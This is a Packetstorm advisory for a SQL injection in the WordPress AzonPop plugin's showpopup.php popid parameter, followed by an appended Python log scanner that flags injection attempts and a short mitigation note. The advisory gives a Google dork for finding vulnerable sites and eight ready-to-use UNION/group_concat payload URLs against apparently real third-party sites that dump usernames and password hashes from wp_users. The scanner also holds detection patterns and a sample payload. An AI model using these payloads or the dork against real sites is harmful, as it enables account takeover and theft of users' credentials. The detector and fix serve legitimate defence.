WordPress AzonPop 1.0.0 SQL Injection

2016-01-08T00:00:00
ID PACKETSTORM:135192
Type packetstorm
Reporter Ac!D
Modified 2016-01-08T00:00:00

Description

                                        
                                            `[*][*][*][*][*][*][*][*][*][*][*]  
[*] Exploit Title : Wordpress AzonPop Plugin SQL Injection  
[*] Exploit Author : Ashiyane Digital Security Team  
[*] Vendor Homepage : azonpop.blogspot.com  
[*] Google Dork : inurl:wp-content/plugins/azonpop  
[*] Date: 8 Jan 2016  
[*] Tested On : Win 10 | CyberFox Browser  
[*]  
[*][*][*][*][*][*][*][*][*][*][]  
[*] Vulnerable PHP File = /AzonPop/files/view/showpopup.php  
[*] Vulnerable Parameter = popid  
[*]  
[*] Injection :   
site.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=   
-->SQL injection <--  
[*]  
[*] Demos :  
[*]  
[*]   
http://www.laredmexicoelpaso.org/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://haircareproducts.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://arthritispain.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://buyrealestate.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://coffeemachines.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://anxiety.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://babyshower.giftbuy.info/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000Group_gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)),0x3c2f62723e)*/,4,5 /*!00000from*/   
wp_psjt8e_users  
[*]  
[*]   
http://diabetescare.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*][*][*][*][*][*][*][*][*][*][*]  
[*] Discovered by : Ac!D  
[*] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for   
vendetta , Sh.Cloner & aMo0 Hassan :)  
[*][*][*][*][*][*][*][*][*][*][*]  
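Added example, not part of the Packetstorm advisory or of the AzonPop plugin: a small Python detector that scans web-server access logs for requests to the showpopup.php endpoint named above and flags any popid value that is not a plain integer, separating generic probing (a stray quote, a non-numeric value) from the MySQL version-comment / UNION style payload the advisory demonstrates. It assumes combined log format (Apache/nginx default); the log lines, timestamps and IP addresses are constructed for this example and are not real traffic.

```python
"""Detect injection attempts against the AzonPop showpopup.php popid parameter
in combined-format access logs. Sample input is constructed, not real traffic."""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Location of the injection as stated in the advisory: this file, this parameter.
VULN_PATH_SUFFIX = "/wp-content/plugins/AzonPop/files/view/showpopup.php"
VULN_PARAM = "popid"

# Markers of the payload style the advisory shows: MySQL inline version comments
# (/*!00000...*/), UNION/SELECT, group_concat and hex-encoded string literals.
SQLI_MARKERS = re.compile(
    r"(/\*!|\bunion\b|\bselect\b|\bgroup_concat\b|0x[0-9a-f]{4,})", re.I
)


def classify_request(path):
    """Classify one request path.

    Returns (is_target, verdict, value) where verdict is one of
    'not_target', 'ok' (plain integer), 'sqli_pattern' or 'non_integer'.
    """
    parts = urlsplit(path)
    if not parts.path.lower().endswith(VULN_PATH_SUFFIX.lower()):
        return (False, "not_target", None)
    # parse_qs percent-decodes the value, so %20 and %27 become ' ' and "'".
    qs = parse_qs(parts.query, keep_blank_values=True)
    value = qs.get(VULN_PARAM, [""])[0]
    if re.fullmatch(r"\d+", value):
        return (True, "ok", value)
    if SQLI_MARKERS.search(value):
        return (True, "sqli_pattern", value)
    return (True, "non_integer", value)


def scan_log(lines):
    """Return (ip, time, verdict, value) for every request to the vulnerable
    endpoint whose popid is not a plain integer. Malformed lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        is_target, verdict, value = classify_request(m.group("path"))
        if is_target and verdict != "ok":
            hits.append((m.group("ip"), m.group("time"), verdict, value))
    return hits


# Constructed sample log lines (documentation-range IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jan/2016:10:00:01 +0000] "GET /wp-content/plugins/AzonPop/files/view/showpopup.php?popid=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jan/2016:10:00:05 +0000] "GET /wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null%20/*!00000union*/%20select%201,2,3 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [08/Jan/2016:10:01:00 +0000] "GET /wp-content/plugins/AzonPop/files/view/showpopup.php?popid=3%27 HTTP/1.1" 500 0 "-" "curl/7.47"',
    '198.51.100.9 - - [08/Jan/2016:10:01:10 +0000] "GET /index.php?p=union HTTP/1.1" 200 100 "-" "curl/7.47"',
]

if __name__ == "__main__":
    for ip, when, verdict, value in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} {verdict}: popid={value!r}")
```

The integer check in classify_request is also the shape of the server-side fix: popid is a row identifier, so the handler should cast it to an integer (or bind it as `%d` through `$wpdb->prepare()`) before it reaches the query, and reject anything else with a 4xx instead of a database call. The advisory does not mention a vendor patch, so treat that as the general mitigation rather than the plugin's own change.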